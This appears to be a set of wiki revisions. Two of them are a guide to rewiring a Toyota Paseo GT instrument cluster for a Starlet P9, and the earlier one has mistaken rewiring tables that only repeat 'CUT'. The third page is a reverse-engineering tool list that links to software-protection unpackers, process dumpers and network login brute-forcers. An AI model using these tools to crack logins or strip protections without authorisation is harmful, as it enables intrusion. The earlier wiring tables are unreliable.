Toyota Paseo GT 1.5 odometer Starlet P9 mod

2025-12-31T13:49:30Z

Polymorphic7:

WIP.

= Modification Overview =
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play "oem-clean" for the '''Toyota P9''' (EP91 4E-FE 1996-1999).
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market.

There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''

__TOC__

== Toyota Starlet P9 Instrument Cluster Pinout ==
Cluster details: P30, with Tachometer by DENSO.
Part numbers: 83800-10060 and 157370-5241.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low battery warning light → diode
|-
| 2 || Connected || Low battery warning light
|-
| 3 || Connected || Parking brake warning light
|-
| 4 || NC || —
|-
| 5 || NC || —
|-
| 6 || Connected || IG− (Tachometer)
|-
| 7 || NC || —
|-
| 8 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 9 || Connected || IG+ (Tachometer)
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || SRS airbag warning light
|-
| 13 || Connected || SRS airbag warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Fog light indicator
|-
| 2 || Connected || High beam indicator
|-
| 3 || Connected || High beam indicator
|-
| 4 || Connected || Left turn signal indicator
|-
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)
|-
| 6 || NC || —
|-
| 7 || NC || —
|-
| 8 || Connected || Lower 4P terminal (next to speedometer)
|-
| 9 || NC || —
|-
| 10 || Connected || Right turn signal indicator
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || ABS warning light
|-
| 3 || Connected || Check engine light (MIL)
|-
| 4 || NC || —
|-
| 5 || Connected || E terminal – temperature gauge
|-
| 6 || Connected || T terminal – temperature gauge
|-
| 7 || NC || —
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || F terminal – fuel gauge
|-
| 13 || NC || —
|-
| 14 || Connected || Gauge backlight lamps
|-
| 15 || Connected || Gauge backlight lamps
|-
| 16 || NC || —
|}

== Paseo GT 1.5 Instrument Cluster Pinout ==
Cluster details: L17, with Tachometer by JECO.
Part numbers: 83800-16080 and 82208-001.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || IG+ (Tachometer)
|-
| 2 || Connected || Low battery warning light → diode
|-
| 3 || Connected || Low battery warning light
|-
| 4 || NC || —
|-
| 5 || Connected || Parking brake warning light
|-
| 6 || Connected || Parking brake warning light
|-
| 7 || Connected || Airbag warning light
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || Connected || P (Tachometer)
|-
| 11 || Connected || Airbag warning light
|-
| 12 || Connected || Open door warning light
|-
| 13 || Connected || Open door warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || High beam indicator
|-
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)
|-
| 3 || Connected || Left turn signal indicator
|-
| 4 || Connected || FU terminal – fuel gauge
|-
| 5 || Connected || Fog light indicator
|-
| 6 || Connected || Lower 4P terminal (next to speedometer)
|-
| 7 || Connected || Upper E terminal (next to speedometer)
|-
| 8 || Connected || Right turn signal indicator
|-
| 9 || NC || —
|-
| 10 || Connected || Master warning light
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || TU terminal – temperature gauge
|-
| 3 || Connected || ABS warning light
|-
| 4 || Connected || Check engine light (MIL)
|-
| 5 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 6 || NC || —
|-
| 7 || Connected || Gauge backlight lamps
|-
| 8 || Connected || TE terminal – temperature gauge
|-
| 9 || Connected || Gauge backlight lamps
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || NC || —
|-
| 13 || NC || —
|-
| 14 || NC || —
|-
| 15 || NC || —
|-
| 16 || NC || —
|}

== Instrument Cluster Wiring Modification ==
These are the modifications needed to be made on the GT cluster.
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.

=== Cutting Traces ===

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 10 || CUT
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT (cut close at FU terminal, leave room to solder)
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

=== Rewiring Traces ===
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 2''' went to
|-
| 2 || Must now connect to what '''PIN 3''' went to
|-
| 3 || Must now connect to what '''PIN 5''' went to
|-
| 5 || NC / OPEN
|-
| 6 || Must now connect to what '''PIN 10''' went to
|-
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light
|-
| 9 || Must now connect to what '''PIN 1''' went to
|-
| 10 || NC / OPEN
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)
|-
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)
|-
| 3 || Must now connect to the top of the high beam indicator light were we disconnected two traces.
|-
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)
|-
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)
|-
| 6 || NC / OPEN
|-
| 7 || NC / OPEN
|-
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown)
|-
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)
|}
Important disconnect both high beam indicator light traces on the top. Just jump the rest of the trace.

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)
|-
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)
|-
| 4 || NC / OPEN
|-
| 5 || Must now connect to what '''PIN 8''' went to
|-
| 7 || NC / OPEN
|-
| 8 || NC / OPEN
|-
| 9 || NC / OPEN
|-
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal
|-
| 14 || Must now connect to what '''PIN 7''' went to
|-
| 15 || Must now connect to what '''PIN 9''' went to
|}

== Notes on the Modification ==
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.
They must all be left OPEN FLOATING ('''important''').

Toyota Paseo GT 1.5 odometer Starlet P9 mod

2025-12-31T13:12:38Z

Polymorphic7: initial commit. Work in progress..

WIP.

= Modification Overview =
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play "oem-clean" for the '''Toyota P9''' (EP91 4E-FE 1996-1999).
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market.

There are three connectors on thee back of these odometer clusters the connectors are both the same type however the pinout is different.
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''

__TOC__

== Toyota Starlet P9 Instrument Cluster Pinout ==
Cluster details: P30, with Tachometer by DENSO.
Part numbers: 83800-10060 and 157370-5241.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low battery warning light → diode
|-
| 2 || Connected || Low battery warning light
|-
| 3 || Connected || Parking brake warning light
|-
| 4 || NC || —
|-
| 5 || NC || —
|-
| 6 || Connected || IG− (Tachometer)
|-
| 7 || NC || —
|-
| 8 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 9 || Connected || IG+ (Tachometer)
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || SRS airbag warning light
|-
| 13 || Connected || SRS airbag warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Fog light indicator
|-
| 2 || Connected || High beam indicator
|-
| 3 || Connected || High beam indicator
|-
| 4 || Connected || Left turn signal indicator
|-
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)
|-
| 6 || NC || —
|-
| 7 || NC || —
|-
| 8 || Connected || Lower 4P terminal (next to speedometer)
|-
| 9 || NC || —
|-
| 10 || Connected || Right turn signal indicator
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || ABS warning light
|-
| 3 || Connected || Check engine light (MIL)
|-
| 4 || NC || —
|-
| 5 || Connected || E terminal – temperature gauge
|-
| 6 || Connected || T terminal – temperature gauge
|-
| 7 || NC || —
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || F terminal – fuel gauge
|-
| 13 || NC || —
|-
| 14 || Connected || Gauge backlight lamps
|-
| 15 || Connected || Gauge backlight lamps
|-
| 16 || NC || —
|}

== Paseo GT 1.5 Instrument Cluster Pinout ==
Cluster details: L17, with Tachometer by JECO.
Part numbers: 83800-16080 and 82208-001.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || IG+ (Tachometer)
|-
| 2 || Connected || Low battery warning light → diode
|-
| 3 || Connected || Low battery warning light
|-
| 4 || NC || —
|-
| 5 || Connected || Parking brake warning light
|-
| 6 || Connected || Parking brake warning light
|-
| 7 || Connected || Airbag warning light
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || Connected || P (Tachometer)
|-
| 11 || Connected || Airbag warning light
|-
| 12 || Connected || Open door warning light
|-
| 13 || Connected || Open door warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || High beam indicator
|-
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)
|-
| 3 || Connected || Left turn signal indicator
|-
| 4 || Connected || FU terminal – fuel gauge
|-
| 5 || Connected || Fog light indicator
|-
| 6 || Connected || Lower 4P terminal (next to speedometer)
|-
| 7 || Connected || Upper E terminal (next to speedometer)
|-
| 8 || Connected || Right turn signal indicator
|-
| 9 || NC || —
|-
| 10 || Connected || Master warning light
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || TU terminal – temperature gauge
|-
| 3 || Connected || ABS warning light
|-
| 4 || Connected || Check engine light (MIL)
|-
| 5 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 6 || NC || —
|-
| 7 || Connected || Gauge backlight lamps
|-
| 8 || Connected || TE terminal – temperature gauge
|-
| 9 || Connected || Gauge backlight lamps
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || NC || —
|-
| 13 || NC || —
|-
| 14 || NC || —
|-
| 15 || NC || —
|-
| 16 || NC || —
|}

== Instrument Cluster Wiring Modification ==
These are the modifications needed to be made on the GT cluster.
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.

=== Cutting Traces ===

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 10 || CUT
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

=== Rewiring Traces ===
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 2''' went to
|-
| 2 || Must now connect to what '''PIN 3''' went to
|-
| 3 || Must now connect to what '''PIN 5''' went to
|-
| 5 || NC / OPEN
|-
| 6 || Must now connect to what '''PIN 10''' went to
|-
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light
|-
| 9 || Must now connect to what '''PIN 1''' went to
|-
| 10 || NC / OPEN
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

== Notes on the Modification ==
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.
They must all be left OPEN FLOATING ('''important''').

Software Tools

2025-08-12T17:46:52Z

Polymorphic7: Add search engines: SearXNG, websurfx, Mwmbl, YaCy P2P search engines. Add more social junk.

[[File:Software_wiki_banner.png|frameless|1280x300px]]

Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!
==Tool Index==
 

====RF Signals Analysis====

*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.

*[https://www.gnuradio.org/ GNU Radio] - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.

*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.

*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -> Import –> Raw Data -> Radio Wave File)

----

====Firmware Analysis====

*[https://github.com/ReFirmLabs/binwalk binwalk] - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.

*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.

*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.

*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.

*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!

====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====

*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.

*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] - is a tool designed to extract files from any type of extractable file.

*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.

*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.

=====Themida Reverse Engineering=====

*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.

*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.

*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.

=====VMProtect Reverse Engineering=====

======VMProtect 2======

*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)
*vmassembler (VMProtect 2 Virtual Instruction Assembler)
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)
*vmhook (VMProtect 2 Virtual Machine Hooking Library)
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)
*vmdevirt (VMProtect Devirtualization)

======VMProtect 3======

*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).
*vmdevirt (VMProtect 3 Static Devirtualization)
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)

=====Code Virtualizer (Oreans Technologies)=====

*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.

=====Enigma Protector=====

*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.

======OllyDbg Scripts======
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]

=====Generic Code Virtualizer=====

*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.

====Reverse Engineering Toolkit AIO====
=====Windows‑focused=====
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit "All-In-One", Built for Security (Malware analysis, Penetration testing) & Educational purposes.
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.

=====Android‑focused=====
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...

====Binary PE Analysis / Editor (Windows)====

*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers. [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com

*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated "DIE" is a program for determining types of files. "DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.

*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.

*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!

*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.

*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.

*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.

*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).

====Hex Editors====

*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.

*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.

*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.

*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.

====Pattern Matching / Pattern Searching====

*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.

*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.

*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.

*[https://github.com/stefankueng/grepWin grepWin] - is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.

*[https://astrogrep.sourceforge.net/ AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a "context" feature which is very nice for looking at source code.

====Comparison Tools (Binary differences)====

*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.

*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.

*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.

*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.

*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.

*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).

====IAT Reconstructors (Windows)====

*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.

====Process Monitors (Windows)====

*[https://github.com/winsiderss/systeminformer/ System Informer] - is a free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.

====Process Dumpers (Windows)====

*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.

*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.

====API monitoring ring3 (Windows)====

*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.

*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.

====Hashing & Crypto====
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills. 
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.

*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.

*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.

====Password cracking====
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.

Offline
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).

*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.

Online (network based bruteforce in LAN).
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.

*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.

*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.

====Virtualization technology (host isolation) or sandboxes====

*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.

*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production.

*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.

*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local & mapped drives or the Windows registry.

*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. "If you implement boundaries and nobody is around to push them, do they even exist?". Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?

*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.

*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.

*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.

*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.

*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.
----

====Dynamic & Static Analysis (mostly '''unmanged''' binaries)====

=====Interactive Disassemblers ('''static analysis''')=====

